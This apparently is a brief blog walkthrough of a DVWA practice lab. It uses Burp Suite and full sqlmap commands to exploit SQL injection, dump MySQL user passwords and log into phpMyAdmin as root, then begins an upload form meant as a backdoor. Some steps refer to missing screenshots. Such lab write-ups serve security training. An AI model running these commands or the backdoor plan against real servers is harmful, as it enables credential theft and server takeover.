1. access dvwa "http://192.168.56.1/dvwa"
user name : admin
password : password
2. security using MEDIUM
3. Open Mantra and brupsuit
on the mantra following refuse step
create proxy for brupsuit
open brupsuite
4. Using proxy brupsuite and then using '
showing in url
result in brupsuite
5. Run sql map
root@bt:/pentest/database/sqlmap#
Showing result
search Table
Search column
Now we can see user and password
showing
6. Ok we get the password but Our Mission is how to make backdoor in the server.. hhmmm so we must try exploit service.. i will try service mysql.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs
=======================================================================
After i try again wity repeat based ways..
>>>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --column
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump
>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --password
we can see that we get is same password
>>> i try open mysql
i'm using password : root
and we can see i manage database.. we will try open phpmyadmin
>>> localhost/phpmyadmin
user : root
password : root
>>> Created database
Sinobi_db;
>>> Created table form
>>> Created table upload
>>> Crated Form form for upload.. "way for Backdoor"
insert the data into table camp
>>> Insert data into table upload
Tidak ada komentar:
Posting Komentar